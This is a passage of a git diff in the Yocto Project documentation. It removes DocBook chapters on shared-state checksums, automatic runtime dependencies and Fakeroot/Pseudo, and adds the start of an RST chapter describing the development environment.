- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-viewing-metadata-used-to-create-the-input-signature-of-a-shared-state-task'>Viewing Metadata Used to Create the Input Signature of a Shared State Task</ulink>"
- and
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-invalidating-shared-state-to-force-a-task-to-run'>Invalidating Shared State to Force a Task to Run</ulink>"
- sections both in the Yocto Project Development Tasks
- Manual.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- The rest of this section goes into detail about the overall
- incremental build architecture, the checksums (signatures), and
- shared state.
- </para>
-
- <section id='concepts-overall-architecture'>
- <title>Overall Architecture</title>
-
- <para>
- When determining what parts of the system need to be built,
- BitBake works on a per-task basis rather than a per-recipe
- basis.
- You might wonder why using a per-task basis is preferred over
- a per-recipe basis.
- To help explain, consider having the IPK packaging backend
- enabled and then switching to DEB.
- In this case, the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
- task outputs are still valid.
- However, with a per-recipe approach, the build would not
- include the <filename>.deb</filename> files.
- Consequently, you would have to invalidate the whole build and
- rerun it.
- Rerunning everything is not the best solution.
- Also, in this case, the core must be "taught" much about
- specific tasks.
- This methodology does not scale well and does not allow users
- to easily add new tasks in layers or as external recipes
- without touching the packaged-staging core.
- </para>
- </section>
-
- <section id='overview-checksums'>
- <title>Checksums (Signatures)</title>
-
- <para>
- The shared state code uses a checksum, which is a unique
- signature of a task's inputs, to determine if a task needs to
- be run again.
- Because it is a change in a task's inputs that triggers a
- rerun, the process needs to detect all the inputs to a given
- task.
- For shell tasks, this turns out to be fairly easy because
- the build process generates a "run" shell script for each task
- and it is possible to create a checksum that gives you a good
- idea of when the task's data changes.
- </para>
-
- <para>
- To complicate the problem, there are things that should not be
- included in the checksum.
- First, there is the actual specific build path of a given
- task - the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>.
- It does not matter if the work directory changes because it
- should not affect the output for target packages.
- Also, the build process has the objective of making native
- or cross packages relocatable.
- <note>
- Both native and cross packages run on the
- <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>.
- However, cross packages generate output for the target
- architecture.
- </note>
- The checksum therefore needs to exclude
- <filename>WORKDIR</filename>.
- The simplistic approach for excluding the work directory is to
- set <filename>WORKDIR</filename> to some fixed value and
- create the checksum for the "run" script.
- </para>
-
- <para>
- Another problem results from the "run" scripts containing
- functions that might or might not get called.
- The incremental build solution contains code that figures out
- dependencies between shell functions.
- This code is used to prune the "run" scripts down to the
- minimum set, thereby alleviating this problem and making the
- "run" scripts much more readable as a bonus.
- </para>
-
- <para>
- So far, solutions for shell scripts exist.
- What about Python tasks?
- The same approach applies even though these tasks are more
- difficult.
- The process needs to figure out what variables a Python
- function accesses and what functions it calls.
- Again, the incremental build solution contains code that first
- figures out the variable and function dependencies, and then
- creates a checksum for the data used as the input to the task.
- </para>
-
- <para>
- Like the <filename>WORKDIR</filename> case, situations exist
- where dependencies should be ignored.
- For these situations, you can instruct the build process to
- ignore a dependency by using a line like the following:
- <literallayout class='monospaced'>
- PACKAGE_ARCHS[vardepsexclude] = "MACHINE"
- </literallayout>
- This example ensures that the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCHS'><filename>PACKAGE_ARCHS</filename></ulink>
- variable does not depend on the value of
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>,
- even if it does reference it.
- </para>
-
- <para>
- Equally, there are cases where you need to add dependencies
- BitBake is not able to find.
- You can accomplish this by using a line like the following:
- <literallayout class='monospaced'>
- PACKAGE_ARCHS[vardeps] = "MACHINE"
- </literallayout>
- This example explicitly adds the <filename>MACHINE</filename>
- variable as a dependency for
- <filename>PACKAGE_ARCHS</filename>.
- </para>
-
- <para>
- As an example, consider a case with in-line Python where
- BitBake is not able to figure out dependencies.
- When running in debug mode (i.e. using
- <filename>-DDD</filename>), BitBake produces output when it
- discovers something for which it cannot figure out dependencies.
- The Yocto Project team has currently not managed to cover
- those dependencies in detail and is aware of the need to fix
- this situation.
- </para>
-
- <para>
- Thus far, this section has limited discussion to the direct
- inputs into a task.
- Information based on direct inputs is referred to as the
- "basehash" in the code.
- However, the question of a task's indirect inputs still
- exits - items already built and present in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- The checksum (or signature) for a particular task needs to add
- the hashes of all the tasks on which the particular task
- depends.
- Choosing which dependencies to add is a policy decision.
- However, the effect is to generate a master checksum that
- combines the basehash and the hashes of the task's
- dependencies.
- </para>
-
- <para>
- At the code level, a variety of ways exist by which both the
- basehash and the dependent task hashes can be influenced.
- Within the BitBake configuration file, you can give BitBake
- some extra information to help it construct the basehash.
- The following statement effectively results in a list of
- global variable dependency excludes (i.e. variables never
- included in any checksum):
- <literallayout class='monospaced'>
- BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH DL_DIR \
- SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
- USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \
- PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \
- CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_DISABLE LICENSE_PATH SDKPKGSUFFIX"
- </literallayout>
- The previous example excludes
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>
- since that variable is actually constructed as a path within
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>,
- which is on the whitelist.
- </para>
-
- <para>
- The rules for deciding which hashes of dependent tasks to
- include through dependency chains are more complex and are
- generally accomplished with a Python function.
- The code in <filename>meta/lib/oe/sstatesig.py</filename> shows
- two examples of this and also illustrates how you can insert
- your own policy into the system if so desired.
- This file defines the two basic signature generators
- <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OE-Core</ulink>
- uses: "OEBasic" and "OEBasicHash".
- By default, a dummy "noop" signature handler is enabled
- in BitBake.
- This means that behavior is unchanged from previous versions.
- OE-Core uses the "OEBasicHash" signature handler by default
- through this setting in the <filename>bitbake.conf</filename>
- file:
- <literallayout class='monospaced'>
- BB_SIGNATURE_HANDLER ?= "OEBasicHash"
- </literallayout>
- The "OEBasicHash" <filename>BB_SIGNATURE_HANDLER</filename>
- is the same as the "OEBasic" version but adds the task hash to
- the
- <link linkend='stamp-files-and-the-rerunning-of-tasks'>stamp files</link>.
- This results in any metadata change that changes the task hash,
- automatically causing the task to be run again.
- This removes the need to bump
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
- values, and changes to metadata automatically ripple across
- the build.
- </para>
-
- <para>
- It is also worth noting that the end result of these
- signature generators is to make some dependency and hash
- information available to the build.
- This information includes:
- <itemizedlist>
- <listitem><para>
- <filename>BB_BASEHASH_task-</filename><replaceable>taskname</replaceable>:
- The base hashes for each task in the recipe.
- </para></listitem>
- <listitem><para>
- <filename>BB_BASEHASH_</filename><replaceable>filename</replaceable><filename>:</filename><replaceable>taskname</replaceable>:
- The base hashes for each dependent task.
- </para></listitem>
- <listitem><para>
- <filename>BBHASHDEPS_</filename><replaceable>filename</replaceable><filename>:</filename><replaceable>taskname</replaceable>:
- The task dependencies for each task.
- </para></listitem>
- <listitem><para>
- <filename>BB_TASKHASH</filename>:
- The hash of the currently running task.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='shared-state'>
- <title>Shared State</title>
-
- <para>
- Checksums and dependencies, as discussed in the previous
- section, solve half the problem of supporting a shared state.
- The other half of the problem is being able to use checksum
- information during the build and being able to reuse or rebuild
- specific components.
- </para>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-sstate'><filename>sstate</filename></ulink>
- class is a relatively generic implementation of how to
- "capture" a snapshot of a given task.
- The idea is that the build process does not care about the
- source of a task's output.
- Output could be freshly built or it could be downloaded and
- unpacked from somewhere.
- In other words, the build process does not need to worry about
- its origin.
- </para>
-
- <para>
- Two types of output exist.
- One type is just about creating a directory in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>.
- A good example is the output of either
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>.
- The other type of output occurs when a set of data is merged
- into a shared directory tree such as the sysroot.
- </para>
-
- <para>
- The Yocto Project team has tried to keep the details of the
- implementation hidden in <filename>sstate</filename> class.
- From a user's perspective, adding shared state wrapping to a
- task is as simple as this
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-deploy'><filename>do_deploy</filename></ulink>
- example taken from the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-deploy'><filename>deploy</filename></ulink>
- class:
- <literallayout class='monospaced'>
- DEPLOYDIR = "${WORKDIR}/deploy-${PN}"
- SSTATETASKS += "do_deploy"
- do_deploy[sstate-inputdirs] = "${DEPLOYDIR}"
- do_deploy[sstate-outputdirs] = "${DEPLOY_DIR_IMAGE}"
-
- python do_deploy_setscene () {
- sstate_setscene(d)
- }
- addtask do_deploy_setscene
- do_deploy[dirs] = "${DEPLOYDIR} ${B}"
- do_deploy[stamp-extra-info] = "${MACHINE_ARCH}"
- </literallayout>
- The following list explains the previous example:
- <itemizedlist>
- <listitem><para>
- Adding "do_deploy" to <filename>SSTATETASKS</filename>
- adds some required sstate-related processing, which is
- implemented in the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-sstate'><filename>sstate</filename></ulink>
- class, to before and after the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-deploy'><filename>do_deploy</filename></ulink>
- task.
- </para></listitem>
- <listitem><para>
- The
- <filename>do_deploy[sstate-inputdirs] = "${DEPLOYDIR}"</filename>
- declares that <filename>do_deploy</filename> places its
- output in <filename>${DEPLOYDIR}</filename> when run
- normally (i.e. when not using the sstate cache).
- This output becomes the input to the shared state cache.
- </para></listitem>
- <listitem><para>
- The
- <filename>do_deploy[sstate-outputdirs] = "${DEPLOY_DIR_IMAGE}"</filename>
- line causes the contents of the shared state cache to be
- copied to <filename>${DEPLOY_DIR_IMAGE}</filename>.
- <note>
- If <filename>do_deploy</filename> is not already in
- the shared state cache or if its input checksum
- (signature) has changed from when the output was
- cached, the task runs to populate the shared
- state cache, after which the contents of the shared
- state cache is copied to
- <filename>${DEPLOY_DIR_IMAGE}</filename>.
- If <filename>do_deploy</filename> is in the shared
- state cache and its signature indicates that the
- cached output is still valid (i.e. if no
- relevant task inputs have changed), then the
- contents of the shared state cache copies
- directly to
- <filename>${DEPLOY_DIR_IMAGE}</filename> by the
- <filename>do_deploy_setscene</filename> task
- instead, skipping the
- <filename>do_deploy</filename> task.
- </note>
- </para></listitem>
- <listitem><para>
- The following task definition is glue logic needed to
- make the previous settings effective:
- <literallayout class='monospaced'>
- python do_deploy_setscene () {
- sstate_setscene(d)
- }
- addtask do_deploy_setscene
- </literallayout>
- <filename>sstate_setscene()</filename> takes the flags
- above as input and accelerates the
- <filename>do_deploy</filename> task through the
- shared state cache if possible.
- If the task was accelerated,
- <filename>sstate_setscene()</filename> returns True.
- Otherwise, it returns False, and the normal
- <filename>do_deploy</filename> task runs.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_BB_URL;#setscene'>setscene</ulink>"
- section in the BitBake User Manual.
- </para></listitem>
- <listitem><para>
- The <filename>do_deploy[dirs] = "${DEPLOYDIR} ${B}"</filename>
- line creates <filename>${DEPLOYDIR}</filename> and
- <filename>${B}</filename> before the
- <filename>do_deploy</filename> task runs, and also sets
- the current working directory of
- <filename>do_deploy</filename> to
- <filename>${B}</filename>.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'>Variable Flags</ulink>"
- section in the BitBake User Manual.
- <note>
- In cases where
- <filename>sstate-inputdirs</filename> and
- <filename>sstate-outputdirs</filename> would be the
- same, you can use
- <filename>sstate-plaindirs</filename>.
- For example, to preserve the
- <filename>${PKGD}</filename> and
- <filename>${PKGDEST}</filename> output from the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
- task, use the following:
- <literallayout class='monospaced'>
- do_package[sstate-plaindirs] = "${PKGD} ${PKGDEST}"
- </literallayout>
- </note>
- </para></listitem>
- <listitem><para>
- The <filename>do_deploy[stamp-extra-info] = "${MACHINE_ARCH}"</filename>
- line appends extra metadata to the
- <link linkend='stamp-files-and-the-rerunning-of-tasks'>stamp file</link>.
- In this case, the metadata makes the task specific
- to a machine's architecture.
- See
- "<ulink url='&YOCTO_DOCS_BB_URL;#ref-bitbake-tasklist'>The Task List</ulink>"
- section in the BitBake User Manual for more
- information on the <filename>stamp-extra-info</filename>
- flag.
- </para></listitem>
- <listitem><para>
- <filename>sstate-inputdirs</filename> and
- <filename>sstate-outputdirs</filename> can also be used
- with multiple directories.
- For example, the following declares
- <filename>PKGDESTWORK</filename> and
- <filename>SHLIBWORK</filename> as shared state
- input directories, which populates the shared state
- cache, and <filename>PKGDATA_DIR</filename> and
- <filename>SHLIBSDIR</filename> as the corresponding
- shared state output directories:
- <literallayout class='monospaced'>
- do_package[sstate-inputdirs] = "${PKGDESTWORK} ${SHLIBSWORKDIR}"
- do_package[sstate-outputdirs] = "${PKGDATA_DIR} ${SHLIBSDIR}"
- </literallayout>
- </para></listitem>
- <listitem><para>
- These methods also include the ability to take a
- lockfile when manipulating shared state directory
- structures, for cases where file additions or removals
- are sensitive:
- <literallayout class='monospaced'>
- do_package[sstate-lockfile] = "${PACKAGELOCK}"
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Behind the scenes, the shared state code works by looking in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></ulink>
- for shared state files.
- Here is an example:
- <literallayout class='monospaced'>
- SSTATE_MIRRORS ?= "\
- file://.* http://someserver.tld/share/sstate/PATH;downloadfilename=PATH \n \
- file://.* file:///some/local/dir/sstate/PATH"
- </literallayout>
- <note>
- The shared state directory
- (<filename>SSTATE_DIR</filename>) is organized into
- two-character subdirectories, where the subdirectory
- names are based on the first two characters of the hash.
- If the shared state directory structure for a mirror has the
- same structure as <filename>SSTATE_DIR</filename>, you must
- specify "PATH" as part of the URI to enable the build system
- to map to the appropriate subdirectory.
- </note>
- </para>
-
- <para>
- The shared state package validity can be detected just by
- looking at the filename since the filename contains the task
- checksum (or signature) as described earlier in this section.
- If a valid shared state package is found, the build process
- downloads it and uses it to accelerate the task.
- </para>
-
- <para>
- The build processes use the <filename>*_setscene</filename>
- tasks for the task acceleration phase.
- BitBake goes through this phase before the main execution
- code and tries to accelerate any tasks for which it can find
- shared state packages.
- If a shared state package for a task is available, the
- shared state package is used.
- This means the task and any tasks on which it is dependent
- are not executed.
- </para>
-
- <para>
- As a real world example, the aim is when building an IPK-based
- image, only the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_ipk'><filename>do_package_write_ipk</filename></ulink>
- tasks would have their shared state packages fetched and
- extracted.
- Since the sysroot is not used, it would never get extracted.
- This is another reason why a task-based approach is preferred
- over a recipe-based approach, which would have to install the
- output from every task.
- </para>
- </section>
- </section>
-
- <section id='automatically-added-runtime-dependencies'>
- <title>Automatically Added Runtime Dependencies</title>
-
- <para>
- The OpenEmbedded build system automatically adds common types of
- runtime dependencies between packages, which means that you do not
- need to explicitly declare the packages using
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>.
- Three automatic mechanisms exist (<filename>shlibdeps</filename>,
- <filename>pcdeps</filename>, and <filename>depchains</filename>)
- that handle shared libraries, package configuration (pkg-config)
- modules, and <filename>-dev</filename> and
- <filename>-dbg</filename> packages, respectively.
- For other types of runtime dependencies, you must manually declare
- the dependencies.
- <itemizedlist>
- <listitem><para>
- <filename>shlibdeps</filename>:
- During the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
- task of each recipe, all shared libraries installed by the
- recipe are located.
- For each shared library, the package that contains the
- shared library is registered as providing the shared
- library.
- More specifically, the package is registered as providing
- the
- <ulink url='https://en.wikipedia.org/wiki/Soname'>soname</ulink>
- of the library.
- The resulting shared-library-to-package mapping
- is saved globally in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></ulink>
- by the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-packagedata'><filename>do_packagedata</filename></ulink>
- task.</para>
-
- <para>Simultaneously, all executables and shared libraries
- installed by the recipe are inspected to see what shared
- libraries they link against.
- For each shared library dependency that is found,
- <filename>PKGDATA_DIR</filename> is queried to
- see if some package (likely from a different recipe)
- contains the shared library.
- If such a package is found, a runtime dependency is added
- from the package that depends on the shared library to the
- package that contains the library.</para>
-
- <para>The automatically added runtime dependency also
- includes a version restriction.
- This version restriction specifies that at least the
- current version of the package that provides the shared
- library must be used, as if
- "<replaceable>package</replaceable> (>= <replaceable>version</replaceable>)"
- had been added to <filename>RDEPENDS</filename>.
- This forces an upgrade of the package containing the shared
- library when installing the package that depends on the
- library, if needed.</para>
-
- <para>If you want to avoid a package being registered as
- providing a particular shared library (e.g. because the library
- is for internal use only), then add the library to
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PRIVATE_LIBS'><filename>PRIVATE_LIBS</filename></ulink>
- inside the package's recipe.
- </para></listitem>
- <listitem><para>
- <filename>pcdeps</filename>:
- During the <filename>do_package</filename> task of each
- recipe, all pkg-config modules
- (<filename>*.pc</filename> files) installed by the recipe
- are located.
- For each module, the package that contains the module is
- registered as providing the module.
- The resulting module-to-package mapping is saved globally in
- <filename>PKGDATA_DIR</filename> by the
- <filename>do_packagedata</filename> task.</para>
-
- <para>Simultaneously, all pkg-config modules installed by
- the recipe are inspected to see what other pkg-config
- modules they depend on.
- A module is seen as depending on another module if it
- contains a "Requires:" line that specifies the other module.
- For each module dependency,
- <filename>PKGDATA_DIR</filename> is queried to see if some
- package contains the module.
- If such a package is found, a runtime dependency is added
- from the package that depends on the module to the package
- that contains the module.
- <note>
- The <filename>pcdeps</filename> mechanism most often
- infers dependencies between <filename>-dev</filename>
- packages.
- </note>
- </para></listitem>
- <listitem><para>
- <filename>depchains</filename>:
- If a package <filename>foo</filename> depends on a package
- <filename>bar</filename>, then <filename>foo-dev</filename>
- and <filename>foo-dbg</filename> are also made to depend on
- <filename>bar-dev</filename> and
- <filename>bar-dbg</filename>, respectively.
- Taking the <filename>-dev</filename> packages as an
- example, the <filename>bar-dev</filename> package might
- provide headers and shared library symlinks needed by
- <filename>foo-dev</filename>, which shows the need
- for a dependency between the packages.</para>
-
- <para>The dependencies added by
- <filename>depchains</filename> are in the form of
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RRECOMMENDS'><filename>RRECOMMENDS</filename></ulink>.
- <note>
- By default, <filename>foo-dev</filename> also has an
- <filename>RDEPENDS</filename>-style dependency on
- <filename>foo</filename>, because the default value of
- <filename>RDEPENDS_${PN}-dev</filename> (set in
- <filename>bitbake.conf</filename>) includes
- "${PN}".
- </note></para>
-
- <para>To ensure that the dependency chain is never broken,
- <filename>-dev</filename> and <filename>-dbg</filename>
- packages are always generated by default, even if the
- packages turn out to be empty.
- See the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-ALLOW_EMPTY'><filename>ALLOW_EMPTY</filename></ulink>
- variable for more information.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The <filename>do_package</filename> task depends on the
- <filename>do_packagedata</filename> task of each recipe in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
- through use of a
- <filename>[</filename><ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>deptask</filename></ulink><filename>]</filename>
- declaration, which guarantees that the required
- shared-library/module-to-package mapping information will be available
- when needed as long as <filename>DEPENDS</filename> has been
- correctly set.
- </para>
- </section>
-
- <section id='fakeroot-and-pseudo'>
- <title>Fakeroot and Pseudo</title>
-
- <para>
- Some tasks are easier to implement when allowed to perform certain
- operations that are normally reserved for the root user (e.g.
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package_write_deb'><filename>do_package_write*</filename></ulink>,
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-rootfs'><filename>do_rootfs</filename></ulink>,
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-image'><filename>do_image*</filename></ulink>).
- For example, the <filename>do_install</filename> task benefits
- from being able to set the UID and GID of installed files to
- arbitrary values.
- </para>
-
- <para>
- One approach to allowing tasks to perform root-only operations
- would be to require
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
- to run as root.
- However, this method is cumbersome and has security issues.
- The approach that is actually used is to run tasks that benefit
- from root privileges in a "fake" root environment.
- Within this environment, the task and its child processes believe
- that they are running as the root user, and see an internally
- consistent view of the filesystem.
- As long as generating the final output (e.g. a package or an image)
- does not require root privileges, the fact that some earlier
- steps ran in a fake root environment does not cause problems.
- </para>
-
- <para>
- The capability to run tasks in a fake root environment is known as
- "<ulink url='http://man.he.net/man1/fakeroot'>fakeroot</ulink>",
- which is derived from the BitBake keyword/variable
- flag that requests a fake root environment for a task.
- </para>
-
- <para>
- In the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>,
- the program that implements fakeroot is known as
- <ulink url='https://www.yoctoproject.org/software-item/pseudo/'>Pseudo</ulink>.
- Pseudo overrides system calls by using the environment variable
- <filename>LD_PRELOAD</filename>, which results in the illusion
- of running as root.
- To keep track of "fake" file ownership and permissions resulting
- from operations that require root permissions, Pseudo uses
- an SQLite 3 database.
- This database is stored in
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}/pseudo/files.db</filename>
- for individual recipes.
- Storing the database in a file as opposed to in memory
- gives persistence between tasks and builds, which is not
- accomplished using fakeroot.
- <note><title>Caution</title>
- If you add your own task that manipulates the same files or
- directories as a fakeroot task, then that task also needs to
- run under fakeroot.
- Otherwise, the task cannot run root-only operations, and
- cannot see the fake file ownership and permissions set by the
- other task.
- You need to also add a dependency on
- <filename>virtual/fakeroot-native:do_populate_sysroot</filename>,
- giving the following:
- <literallayout class='monospaced'>
- fakeroot do_mytask () {
- ...
- }
- do_mytask[depends] += "virtual/fakeroot-native:do_populate_sysroot"
- </literallayout>
- </note>
- For more information, see the
- <ulink url='&YOCTO_DOCS_BB_URL;#var-FAKEROOT'><filename>FAKEROOT*</filename></ulink>
- variables in the BitBake User Manual.
- You can also reference the
- "<ulink url='https://github.com/wrpseudo/pseudo/wiki/WhyNotFakeroot'>Why Not Fakeroot?</ulink>"
- article for background information on Fakeroot and Pseudo.
- </para>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/overview-manual/overview-manual-customization.xsl b/documentation/overview-manual/overview-manual-customization.xsl
deleted file mode 100644
index 22360e7bab..0000000000
--- a/documentation/overview-manual/overview-manual-customization.xsl
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'overview-manual-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel" select="A" />
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
- <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/overview-manual/overview-manual-development-environment.rst b/documentation/overview-manual/overview-manual-development-environment.rst
new file mode 100644
index 0000000000..a5469d4d78
--- /dev/null
+++ b/documentation/overview-manual/overview-manual-development-environment.rst
@@ -0,0 +1,672 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****************************************
+The Yocto Project Development Environment
+*****************************************
+
+This chapter takes a look at the Yocto Project development environment.
+The chapter provides Yocto Project Development environment concepts that
+help you understand how work is accomplished in an open source
+environment, which is very different as compared to work accomplished in
+a closed, proprietary environment.
+
+Specifically, this chapter addresses open source philosophy, source
+repositories, workflows, Git, and licensing.
+
+Open Source Philosophy
+======================
+
+Open source philosophy is characterized by software development directed
+by peer production and collaboration through an active community of
+developers. Contrast this to the more standard centralized development
+models used by commercial software companies where a finite set of
+developers produces a product for sale using a defined set of procedures
+that ultimately result in an end product whose architecture and source
+material are closed to the public.
+
+Open source projects conceptually have differing concurrent agendas,
+approaches, and production. These facets of the development process can
+come from anyone in the public (community) who has a stake in the
+software project. The open source environment contains new copyright,
+licensing, domain, and consumer issues that differ from the more
+traditional development environment. In an open source environment, the
+end product, source material, and documentation are all available to the
+public at no cost.
+
+A benchmark example of an open source project is the Linux kernel, which
+was initially conceived and created by Finnish computer science student
+Linus Torvalds in 1991. Conversely, a good example of a non-open source
+project is the Windows family of operating systems developed by
+Microsoft Corporation.
+
+Wikipedia has a good historical description of the Open Source
+Philosophy `here <http://en.wikipedia.org/wiki/Open_source>`__. You can
+also find helpful information on how to participate in the Linux
+Community
+`here <https://www.kernel.org/doc/html/latest/process/index.html>`__.
+
+.. _gs-the-development-host:
+
+The Development Host
+====================
+
+A development host or :term:`Build Host` is key to
+using the Yocto Project. Because the goal of the Yocto Project is to
+develop images or applications that run on embedded hardware,
+development of those images and applications generally takes place on a
+system not intended to run the software - the development host.
+
+You need to set up a development host in order to use it with the Yocto
+Project. Most find that it is best to have a native Linux machine
+function as the development host. However, it is possible to use a
+system that does not run Linux as its operating system as your
+development host. When you have a Mac or Windows-based system, you can
+set it up as the development host by using
+`CROPS <https://github.com/crops/poky-container>`__, which leverages
+`Docker Containers <https://www.docker.com/>`__. Once you take the steps
+to set up a CROPS machine, you effectively have access to a shell
+environment that is similar to what you see when using a Linux-based
+development host. For the steps needed to set up a system using CROPS,
+see the
+":ref:`dev-manual/dev-manual-start:setting up to use cross platforms (crops)`"
+section in
+the Yocto Project Development Tasks Manual.
+
+If your development host is going to be a system that runs a Linux
+distribution, steps still exist that you must take to prepare the system
+for use with the Yocto Project. You need to be sure that the Linux
+distribution on the system is one that supports the Yocto Project. You
+also need to be sure that the correct set of host packages are installed
+that allow development using the Yocto Project. For the steps needed to
+set up a development host that runs Linux, see the
+":ref:`dev-manual/dev-manual-start:setting up a native linux host`"
+section in the Yocto Project Development Tasks Manual.
+
+Once your development host is set up to use the Yocto Project, several
+methods exist for you to do work in the Yocto Project environment:
+
+- *Command Lines, BitBake, and Shells:* Traditional development in the
+ Yocto Project involves using the :term:`OpenEmbedded Build System`,
+ which uses
+ BitBake, in a command-line environment from a shell on your
+ development host. You can accomplish this from a host that is a
+ native Linux machine or from a host that has been set up with CROPS.
+ Either way, you create, modify, and build images and applications all
+ within a shell-based environment using components and tools available
+ through your Linux distribution and the Yocto Project.
+
+ For a general flow of the build procedures, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:building a simple image`"
+ section in the Yocto Project Development Tasks Manual.
+
+- *Board Support Package (BSP) Development:* Development of BSPs
+ involves using the Yocto Project to create and test layers that allow
+ easy development of images and applications targeted for specific
+ hardware. To development BSPs, you need to take some additional steps
+ beyond what was described in setting up a development host.
+
+ The :doc:`../bsp-guide/bsp-guide` provides BSP-related development
+ information. For specifics on development host preparation, see the
+ ":ref:`bsp-guide/bsp:preparing your build host to work with bsp layers`"
+ section in the Yocto Project Board Support Package (BSP) Developer's
+ Guide.
+
+- *Kernel Development:* If you are going to be developing kernels using
+ the Yocto Project you likely will be using ``devtool``. A workflow
+ using ``devtool`` makes kernel development quicker by reducing
+ iteration cycle times.
+
+ The :doc:`../kernel-dev/kernel-dev` provides kernel-related
+ development information. For specifics on development host
+ preparation, see the
+ ":ref:`kernel-dev/kernel-dev-common:preparing the build host to work on the kernel`"
+ section in the Yocto Project Linux Kernel Development Manual.
+
+- *Using Toaster:* The other Yocto Project development method that
+ involves an interface that effectively puts the Yocto Project into
+ the background is Toaster. Toaster provides an interface to the
+ OpenEmbedded build system. The interface enables you to configure and
+ run your builds. Information about builds is collected and stored in
+ a database. You can use Toaster to configure and start builds on
